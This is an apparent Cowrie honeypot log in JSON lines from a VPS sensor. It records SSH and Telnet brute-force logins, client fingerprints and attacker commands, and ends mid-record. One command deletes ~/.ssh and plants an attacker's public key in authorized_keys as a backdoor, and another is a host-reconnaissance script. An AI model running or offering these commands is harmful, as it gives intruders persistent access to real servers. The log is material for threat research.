5@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:36:04.699736Z","src_ip":"24.108.102.132","session":"b4b27e2ab280"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":52250,"dst_ip":"1.2.3.4","dst_port":22,"session":"72297f386931","protocol":"ssh","message":"New connection: 45.88.8.215:52250 (1.2.3.4:22) [session: 72297f386931]","sensor":"my-vps","timestamp":"2025-08-26T00:36:04.743864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:36:04.961477Z","src_ip":"45.88.8.215","session":"72297f386931"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T00:36:04.962723Z","src_ip":"45.88.8.215","session":"72297f386931"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:36:05.011643Z","src_ip":"45.88.8.186","session":"bce0afb0bb32"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T00:36:05.012423Z","src_ip":"45.88.8.186","session":"bce0afb0bb32"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:36:05.371832Z","src_ip":"24.108.102.132","session":"b4b27e2ab280"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:06.540384Z","src_ip":"24.108.102.132","session":"b4b27e2ab280"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":43118,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac338c43e96e","protocol":"ssh","message":"New connection: 24.108.102.132:43118 (1.2.3.4:22) [session: ac338c43e96e]","sensor":"my-vps","timestamp":"2025-08-26T00:36:06.697215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:36:06.702532Z","src_ip":"24.108.102.132","session":"ac338c43e96e"}
{"eventid":"cowrie.session.closed","duration":12.775448560714722,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:06.807483Z","src_ip":"212.227.125.160","session":"da30ca84757b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:36:06.865180Z","src_ip":"24.108.102.132","session":"ac338c43e96e"}
{"eventid":"cowrie.login.success","username":"root","password":"Jaival@123","message":"login attempt [root/Jaival@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:36:06.942277Z","src_ip":"45.88.8.215","session":"72297f386931"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45761,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a96b3e99d3c","protocol":"telnet","message":"New connection: 212.227.125.160:45761 (1.2.3.4:23) [session: 7a96b3e99d3c]","sensor":"my-vps","timestamp":"2025-08-26T00:36:07.002231Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:07.400572Z","src_ip":"45.88.8.215","session":"72297f386931"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:36:07.523933Z","src_ip":"24.108.102.132","session":"ac338c43e96e"}
{"eventid":"cowrie.login.success","username":"root","password":"123456654321","message":"login attempt [root/123456654321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:36:07.587660Z","src_ip":"45.88.8.186","session":"bce0afb0bb32"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:07.685499Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:07.691019Z","src_ip":"24.108.102.132","session":"ac338c43e96e"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:08.175133Z","src_ip":"45.88.8.186","session":"bce0afb0bb32"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":59452,"dst_ip":"1.2.3.4","dst_port":22,"session":"1aa16e38f5ee","protocol":"ssh","message":"New connection: 36.89.28.139:59452 (1.2.3.4:22) [session: 1aa16e38f5ee]","sensor":"my-vps","timestamp":"2025-08-26T00:36:12.803319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:36:12.804843Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:36:13.024057Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.login.success","username":"root","password":"qweasd123!@#","message":"login attempt [root/qweasd123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:36:14.572767Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:36:15.034198Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:36:15.035048Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:36:15.036395Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:15.256452Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:36:15.808166Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:36:15.808993Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:36:16.030760Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:16.031775Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":49622,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a5c6565dae6","protocol":"ssh","message":"New connection: 36.89.28.139:49622 (1.2.3.4:22) [session: 2a5c6565dae6]","sensor":"my-vps","timestamp":"2025-08-26T00:36:16.213860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:36:16.214612Z","src_ip":"36.89.28.139","session":"2a5c6565dae6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:36:16.409621Z","src_ip":"36.89.28.139","session":"2a5c6565dae6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:36:17.271242Z","src_ip":"36.89.28.139","session":"2a5c6565dae6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:18.469342Z","src_ip":"36.89.28.139","session":"2a5c6565dae6"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":49634,"dst_ip":"1.2.3.4","dst_port":22,"session":"5557617602c4","protocol":"ssh","message":"New connection: 36.89.28.139:49634 (1.2.3.4:22) [session: 5557617602c4]","sensor":"my-vps","timestamp":"2025-08-26T00:36:18.683025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:36:18.684129Z","src_ip":"36.89.28.139","session":"5557617602c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:36:18.892742Z","src_ip":"36.89.28.139","session":"5557617602c4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:36:19.768315Z","src_ip":"36.89.28.139","session":"5557617602c4"}
{"eventid":"cowrie.session.closed","duration":12.805050373077393,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:19.807231Z","src_ip":"212.227.125.160","session":"7a96b3e99d3c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:19.978392Z","src_ip":"36.89.28.139","session":"5557617602c4"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:19.982524Z","src_ip":"36.89.28.139","session":"1aa16e38f5ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46096,"dst_ip":"1.2.3.4","dst_port":23,"session":"0bdc6146a925","protocol":"telnet","message":"New connection: 212.227.125.160:46096 (1.2.3.4:23) [session: 0bdc6146a925]","sensor":"my-vps","timestamp":"2025-08-26T00:36:20.040833Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:24.950433Z","src_ip":"176.65.148.28","session":"1c56e6d570ed"}
{"eventid":"cowrie.session.closed","duration":180.06837487220764,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:24.954732Z","src_ip":"176.65.148.28","session":"1c56e6d570ed"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.101","src_port":42700,"dst_ip":"1.2.3.4","dst_port":22,"session":"70825268fd36","protocol":"ssh","message":"New connection: 196.251.85.101:42700 (1.2.3.4:22) [session: 70825268fd36]","sensor":"my-vps","timestamp":"2025-08-26T00:36:29.556320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:36:29.899879Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T00:36:30.033325Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:36:31.362802Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:36:32.203997Z","src_ip":"196.251.85.101","session":"70825268fd36"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; 